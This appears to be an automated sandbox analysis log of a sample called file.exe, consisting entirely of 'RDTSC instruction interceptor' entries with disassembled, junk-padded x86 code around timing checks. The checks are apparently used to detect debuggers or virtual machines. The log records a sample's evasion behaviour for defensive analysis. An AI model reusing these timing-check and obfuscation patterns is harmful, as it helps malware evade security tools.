                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2405A second address: B240BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0AD95F8828h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1D80h], ecx 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+12450094h], eax 0x0000002f pop edi 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+1246257Ah], ecx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122DB8C3h], ecx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0AD95F8835h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F37 second address: B24F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F3B second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24F48 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0AD8C6A9B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F0AD8C6A9C7h 0x00000027 push 00000000h 0x00000029 add edi, 7ED3A103h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0AD8C6A9B8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, 6EFFF232h 0x00000051 mov bh, 15h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jbe 00007F0AD8C6A9B8h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F0AD8C6A9BEh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25E96 second address: B25F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0AD95F8833h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, A1D5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F0AD95F882Bh 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122DB8AFh], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 jmp 00007F0AD95F8833h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0AD95F882Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26D9B second address: B26DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26DA1 second address: B26DAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B260C1 second address: B26131 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0AD8C6A9B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2E64h], ecx 0x0000002d mov bx, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnp 00007F0AD8C6A9BCh 0x0000003d add dword ptr [ebp+122D1894h], ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a or dword ptr [ebp+122D339Fh], edx 0x00000050 mov eax, dword ptr [ebp+122D10E9h] 0x00000056 sbb di, CE16h 0x0000005b mov ebx, dword ptr [ebp+122D2BDDh] 0x00000061 push FFFFFFFFh 0x00000063 stc 0x00000064 nop 0x00000065 pushad 0x00000066 jnc 00007F0AD8C6A9BCh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26EEC second address: B26F0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0AD95F8835h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26F0D second address: B26F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B26FD0 second address: B26FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A176 second address: B2A17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B281C4 second address: B281C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E34E second address: B2E352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E352 second address: B2E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD95F8835h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F1E0 second address: B2F1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0AD8C6A9B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A4A5 second address: B2A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C45E second address: B2C4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov edi, 2734DDEBh 0x00000016 sub dword ptr [ebp+122D1AB2h], esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, CE72h 0x00000027 mov eax, dword ptr [ebp+122D04BDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0AD8C6A9B8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 sbb bh, FFFFFF9Ah 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F0AD8C6A9B8h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3016A second address: B3016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D477 second address: B2D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E468 second address: B2E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0AD95F882Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C4E7 second address: B2C4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3016E second address: B301F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0AD95F8828h 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F0AD95F8836h 0x00000014 jmp 00007F0AD95F8830h 0x00000019 nop 0x0000001a pushad 0x0000001b mov dl, C1h 0x0000001d mov dword ptr [ebp+122D339Fh], ebx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0AD95F8828h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1CF2h], edx 0x00000046 push 00000000h 0x00000048 sub dword ptr [ebp+122D34B1h], eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0AD95F882Bh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0AD95F8833h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2E47C second address: B2E481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B301F3 second address: B30200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D557 second address: B2D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2D55B second address: B2D583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F882Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B350BF second address: B350CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B394BB second address: B394C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0AD95F8826h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF384 second address: ADF39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF39A second address: ADF3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF3A2 second address: ADF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C41 second address: B38C5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0AD95F882Fh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C5E second address: B38C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C62 second address: B38C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C68 second address: B38C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C6E second address: B38C78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38C78 second address: B38C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a jnp 00007F0AD8C6A9BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38DC0 second address: B38DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F75D second address: B3F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F763 second address: B3F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F770 second address: B3F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F776 second address: B3F793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0AD95F882Fh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F793 second address: B3F7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F854 second address: B3F85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0AD95F8826h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F85E second address: B3F893 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jnl 00007F0AD8C6A9B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e je 00007F0AD8C6A9DEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0AD8C6A9BDh 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F950 second address: B3F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3F968 second address: B3F96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D98 second address: B43D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B441C8 second address: B441FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f push edx 0x00000010 je 00007F0AD8C6A9B6h 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b jmp 00007F0AD8C6A9C2h 0x00000020 pop ebx 0x00000021 ja 00007F0AD8C6A9BEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B441FE second address: B44204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4436C second address: B44373 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44373 second address: B4437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4437C second address: B44380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4476E second address: B44774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44774 second address: B4477E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0AD8C6A9B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4477E second address: B4479D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0AD95F8836h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DC7B second address: B4DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F0AD8C6A9BEh 0x0000000c pop ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0AD8C6A9C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DCA9 second address: B4DCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DCAD second address: B4DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DCB1 second address: B4DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8831h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8836h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DCE2 second address: B4DCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CD1D second address: B4CD27 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CFE9 second address: B4CFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CFED second address: B4D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8839h 0x0000000b pushad 0x0000000c jns 00007F0AD95F8826h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D173 second address: B4D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0AD8C6A9C9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D19A second address: B4D1A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D1A1 second address: B4D1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0AD8C6A9BFh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D4B2 second address: B4D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0AD95F882Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DAF4 second address: B4DAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DAF8 second address: B4DB02 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DB02 second address: B4DB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50DA4 second address: B50DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55E42 second address: B55E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0AD8C6A9BAh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B177C4 second address: B177CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17CF9 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0AD8C6A9BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D37EBh], edi 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov dx, 2BEBh 0x0000001d call dword ptr [ebp+122D3589h] 0x00000023 pushad 0x00000024 jng 00007F0AD8C6A9BCh 0x0000002a mov dword ptr [ebp+122D34B1h], eax 0x00000030 xor eax, eax 0x00000032 jmp 00007F0AD8C6A9BEh 0x00000037 add dword ptr [ebp+122D34B1h], ebx 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 or dword ptr [ebp+122D34B1h], ebx 0x00000047 add dword ptr [ebp+122D34B1h], edi 0x0000004d mov dword ptr [ebp+122D29C9h], eax 0x00000053 mov dword ptr [ebp+122D34B1h], edi 0x00000059 mov esi, 0000003Ch 0x0000005e mov dword ptr [ebp+122D2E75h], edx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jg 00007F0AD8C6A9B7h 0x0000006e lodsw 0x00000070 jmp 00007F0AD8C6A9C2h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007F0AD8C6A9BEh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D34B1h], edi 0x00000088 push eax 0x00000089 pushad 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1808D second address: B180BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F0AD95F883Dh 0x00000010 pushad 0x00000011 jmp 00007F0AD95F882Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1833B second address: B18341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
